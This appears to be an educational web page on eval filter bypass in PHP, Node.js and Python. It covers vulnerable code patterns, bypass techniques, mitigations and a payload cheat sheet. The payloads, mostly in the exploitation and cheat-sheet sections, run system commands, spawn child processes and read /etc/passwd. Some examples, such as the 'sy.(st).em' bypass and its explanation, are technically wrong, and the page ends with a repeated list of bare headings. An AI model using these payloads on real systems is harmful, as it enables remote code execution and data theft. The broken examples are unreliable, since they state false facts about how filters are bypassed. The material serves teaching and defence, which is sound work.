Eval Filter Bypass Playground

⚠️ Important: This is for educational purposes only. Never test vulnerabilities on systems without permission.

🎯 1. What is Eval Filter Bypass?

Eval Filter Bypass is a vulnerability where an attacker bypasses input filters to execute arbitrary code through an application's eval() function or similar dynamic code execution features.

Why It's Dangerous:

Complete server compromise
Remote code execution
Sensitive data exposure
Website defacement
Pivoting to internal systems

Real-World Example:

A PHP application uses eval() with filtered input:

$input = $_GET['calc'];
// Filter out dangerous characters
$filtered = str_replace([';', '$', '{', '}'], '', $input);
eval("echo $filtered;");

Attackers can bypass with:

?calc=(1).system('id')

This executes the id command while appearing to be a simple calculation!

🔍 2. Vulnerability Requirements

Requirement	Why It Matters	Example
Dynamic code execution	Provides the injection point	`eval()`, `Function()`, `setTimeout()`
User input in evaluation	Source of malicious payload	`eval(user_input)`
Incomplete filtering	Allows bypass attempts	Blacklisting instead of allowlisting

Spot the Vulnerability:

// Node.js code - can you find the issue?
app.get('/execute', (req, res) => {
    const code = req.query.code.replace(/require|import/g, '');
    const result = eval(code);
    res.send(result);
});

Vulnerability: The filter only blocks require and import, but many other dangerous constructs remain:

?code=process.mainModule.constructor._load('child_process').execSync('id')

🔎 3. Whitebox Code Review

Dangerous JavaScript Patterns:

eval() with user input
Function() constructor
setTimeout()/setInterval() with strings
new Function() with dynamic parameters
script tag injection

Dangerous PHP Patterns:

eval() function
assert() with dynamic code
create_function()
preg_replace() with /e modifier

Dangerous Python Patterns:

eval() with user input
exec() function
pickle with untrusted data
yaml.load() instead of yaml.safe_load()

Code Review Challenge:

// PHP code with filter - is this secure?
$input = $_GET['input'];
$filtered = str_replace(['system', 'exec', 'shell_exec'], '', $input);
eval($filtered . ';');

Answer: No! The filter is easily bypassed:

?input=sy.(st).em('id');//
// Becomes: ''em('id');// after filter
// But PHP interprets as: system('id')

⚔️ 4. Exploiting Eval Filter Bypass

Basic Exploitation Techniques:

Technique	Description	Example
String Concatenation	Bypass keyword filters	`"sy"."stem"("id")`
Comments	Hide malicious parts	`system/filtered/('id')`
Alternative Syntax	Use less common syntax	eval("`id`") (backticks in JS)
Encoding	Obfuscate payload	`eval("\x73\x79\x73\x74\x65\x6d\x28\x27\x69\x64\x27\x29")`

Try It Out (Simulated):

PHP calculator: calc.php?input=

Results will appear here

🚀 5. Advanced Techniques

Advanced JavaScript Bypasses:

Prototype pollution to gain RCE
Using constructor.constructor to recreate functions
Template string exploitation
Import-like functionality without import

Example Payload:

?code=this.constructor.constructor('return process.mainModule.require("child_process").execSync("id")')()

Advanced PHP Bypasses:

Variable functions ($func = "system"; $func("id");)
Alternative syntax for commands
Unicode/normalization bypasses
Complex string operations

Example Payload:

?input=$_="s"."y"."s"."t"."e"."m";$_("id");

Advanced Python Bypasses:

Using __import__ instead of import
Attribute chaining to reach dangerous functions
Bytecode manipulation
Builtins access

Example Payload:

__import__('os').system('id')

🛡️ 6. Filter Bypass Techniques

Filter	Bypass Technique	Example
Blacklisted words	String concatenation	`"sy"."stem"("id")`
Parentheses	Backticks (JS) or PHP execution operator	eval("`id`")
Spaces	Comments or no spaces	`eval("system/space/('id')")`
Multiple filters	Nested encoding	`eval(String.fromCharCode(97,108,101,114,116,40,49,41))`

📋 7. Payload Cheat Sheet

JavaScript Payloads:

Basic eval

eval('alert(1)')

Without eval

Function('alert(1)')()

Node.js RCE

require('child_process').execSync('id')

PHP Payloads:

Basic system

system('id');

Alternative syntax

`id`

File read

echo file_get_contents('/etc/passwd');

Python Payloads:

Basic OS command

__import__('os').system('id')

Subprocess

__import__('subprocess').check_output('id',shell=True)

🔒 8. Mitigation Strategies

Defensive Measures:

Avoid eval() and similar functions
Use safe alternatives (sandboxed interpreters)
Implement strict allowlisting (not blacklisting)
Run with least privileges
Use language-specific safe APIs
Sandbox if evaluation is absolutely necessary

Secure Coding Example (Node.js):

// Dangerous
app.get('/eval', (req, res) => {
    const result = eval(req.query.code);
    res.send(result);
});

// Secure alternative
const safeEval = require('safe-eval');
app.get('/calculate', (req, res) => {
    try {
        const result = safeEval(req.query.code, {
            allowed: ['Math', 'Number'] // Only allow specific APIs
        });
        res.send(result);
    } catch (e) {
        res.status(400).send('Invalid input');
    }
});

💻 Interactive Eval Lab

Welcome to the Eval Injection Simulator!

Try these payloads in the simulated vulnerable endpoint:

1;system('id') - Basic PHP injection
1&&eval("alert(1)") - JavaScript eval
__import__('os').system('id') - Python

🔓 Eval Filter Bypass Playground

🎯 1. What is Eval Filter Bypass?

Why It's Dangerous:

Real-World Example:

🔍 2. Vulnerability Requirements

Spot the Vulnerability:

🔎 3. Whitebox Code Review

Dangerous JavaScript Patterns:

Dangerous PHP Patterns:

Dangerous Python Patterns:

Code Review Challenge:

⚔️ 4. Exploiting Eval Filter Bypass

Basic Exploitation Techniques:

Try It Out (Simulated):

🚀 5. Advanced Techniques

Advanced JavaScript Bypasses:

Advanced PHP Bypasses:

Advanced Python Bypasses:

🛡️ 6. Filter Bypass Techniques

📋 7. Payload Cheat Sheet

JavaScript Payloads:

PHP Payloads:

Python Payloads:

🔒 8. Mitigation Strategies

Defensive Measures:

Secure Coding Example (Node.js):

💻 Interactive Eval Lab

📚 9. Additional Resources